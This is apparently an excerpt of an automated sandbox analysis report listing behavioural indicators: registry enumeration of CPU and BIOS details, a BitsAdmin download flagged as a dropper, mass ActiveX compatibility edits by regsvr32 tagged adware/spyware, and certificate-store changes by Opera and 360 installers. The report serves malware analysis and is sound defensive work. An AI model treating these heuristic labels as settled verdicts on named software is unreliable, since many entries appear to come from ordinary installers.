File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\RegSvcs.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\assembly\tmp\AS889BI0\IEExecRemote.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1172.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{979127D3-7D01-4FDE-AF65-A698091468AF}\AlternateCLSID = "{CCDB0DF2-FD1A-4856-80BC-32929D8359B7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{7DC6F291-BF55-4E50-B619-EF672D9DCC58}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{3B7C8860-D78F-101B-B9B5-04021C009402} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F9043C85-F6F2-101A-A3C9-08002B2F49FB}\AlternateCLSID = "{8F0F480A-4366-4737-8265-2AD6FDAC8C31}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{232E456A-87C3-11D1-8BE3-0000F8754DA1} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\AlternateCLSID = "{CCDB0DF2-FD1A-4856-80BC-32929D8359B7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{648A5600-2C6E-101B-82B6-000000000014}\AlternateCLSID = "{F6565773-FA54-45E9-941C-2505E54D5710}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6D835690-900B-11D0-9484-00A0C91110ED}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{39977C62-C383-463D-AF61-C71220634656} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{27395F85-0C0C-101B-A3C9-08002B2F49FB}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BDD1F04B-858B-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C74190B6-8589-11D1-B16A-00C0F0283628}\AlternateCLSID = "{95F0B3BE-E8AC-4995-9DCA-419849E06410}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{2C247F23-8591-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F91CAF91-225B-43A7-BB9E-472F991FC402}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6A227305-5C14-4EFD-AC52-516FE226F947}\AlternateCLSID = "{D8C1B55B-12DC-457F-97EC-4B84305FAA13}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6B7E638F-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{612A8624-0FB3-11CE-8747-524153480004}\AlternateCLSID = "{29D5EC7E-6245-4DC9-9E53-A9A945AD4ABB}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{603C7E80-87C2-11D1-8BE3-0000F8754DA1}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{48E59293-9880-11CF-9754-00AA00C00908} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{99FF4677-FFC3-11D0-BD02-00C04FC2FB86}\AlternateCLSID = "{D606EEC9-8368-4F10-88DB-BF5563EC36F6}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6FBA474B-43AC-11CE-9A0E-00AA0062BB4C}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6FBA474B-43AC-11CE-9A0E-00AA0062BB4C}\AlternateCLSID = "{D88A442E-9C85-48E3-A6F8-EF61C93989A0}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{44E266A2-CD46-47A0-9ED5-EEEC5F0C2A6E}\AlternateCLSID = "{703EAF2B-FD9F-41BC-BB81-6C6757A46E5E}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1EFB6596-857C-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{232E456A-87C3-11D1-8BE3-0000F8754DA1}\AlternateCLSID = "{F1651457-356D-4CA2-989D-701606A4C828}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{996BF5E0-8044-4650-ADEB-0B013914E99C}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{99FF4677-FFC3-11D0-BD02-00C04FC2FB86}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1E216240-1B7D-11CF-9D53-00AA003C9CB6}\AlternateCLSID = "{261399BF-4DBC-4731-B79F-EF8871D7CB36}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E8F8E80F-02EB-44CC-ABB5-6E5132BA6B24}\AlternateCLSID = "{962F28D6-107D-47A5-9515-2864454CFDD1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{603C7E80-87C2-11D1-8BE3-0000F8754DA1} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{97992019-74A6-46C7-9CA3-7F8C0D39940B}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0713E8A2-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F08DF954-8592-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{66833FE6-8583-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0ECD9B64-23AA-11D0-B351-00A0C9055D8E}\AlternateCLSID = "{D8C1B55B-12DC-457F-97EC-4B84305FAA13}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\AlternateCLSID = "{80B51087-CE4C-4FAE-8401-B6B3809DD234}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{79C784C5-8F0D-4A55-ADB3-590CCFC8EB0D}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{39977C62-C383-463D-AF61-C71220634656}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BDC217C5-ED16-11CD-956C-0000C04E4C0A}\AlternateCLSID = "{942085FD-8AEE-465F-ADD7-5E7AA28F8C14}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{20DD1B9E-87C4-11D1-8BE3-0000F8754DA1}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{24B224E0-9545-4A2F-ABD5-86AA8A849385}\AlternateCLSID = "{9A948063-66C3-4F63-AB46-582EDAA35047}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{3B7C8860-D78F-101B-B9B5-04021C009402}\AlternateCLSID = "{894BA3A3-3CA3-402F-B4FE-CD08337E9535}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{7DC6F291-BF55-4E50-B619-EF672D9DCC58} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C1A8AF25-1257-101B-8FB0-0020AF039CA3}\AlternateCLSID = "{F65348F7-505D-4FAB-B66C-D76CFFC2BD78}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{232E456A-87C3-11D1-8BE3-0000F8754DA1}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E35A5B50-1B6B-4C46-A323-42214F91F48B}\AlternateCLSID = "{261399BF-4DBC-4731-B79F-EF8871D7CB36}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E8F8E80F-02EB-44CC-ABB5-6E5132BA6B24} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{66833FE6-8583-11D1-B16A-00C0F0283628}\AlternateCLSID = "{8B2ADD10-33B7-4506-9569-0A1E1DBBEBAE}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{9ED94440-E5E8-101B-B9B5-444553540000}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{44E266A2-CD46-47A0-9ED5-EEEC5F0C2A6E}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\AlternateCLSID = "{E44F7BD4-3AB1-4D55-9190-FC53343AD2D2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{02A69B00-081B-101B-8933-08002B2F4F5A} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{53749718-F78D-4A67-8703-8AE050075170} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{53749718-F78D-4A67-8703-8AE050075170}\AlternateCLSID = "{25A3C2C9-8F6E-4140-BEF3-535D4B9709D8}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C74190B6-8589-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{996BF5E0-8044-4650-ADEB-0B013914E99C} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F08DF954-8592-11D1-B16A-00C0F0283628}\AlternateCLSID = "{0B314611-2C19-4AB4-8513-A6EEA569D3C4}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E} C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Opera Software\ATTEMPTS = "2" C:\Program Files (x86)\Opera\36.0.2130.80\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Opera Software C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\360Safe\360Scan\NetProbe C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\360Safe C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\OperaStable\shell\open\ddeexec C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\OperaStable\shell\open\command C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\OperaStable\shell\open C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Opera Software C:\Program Files (x86)\Opera\36.0.2130.80\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE0C9A50-468A-408D-8A2E-DBC6B5B5E09A}\WpadDecisionReason = "1" C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\OperaStable\shell\open\ddeexec\Topic\ C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e\52C64B7E C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
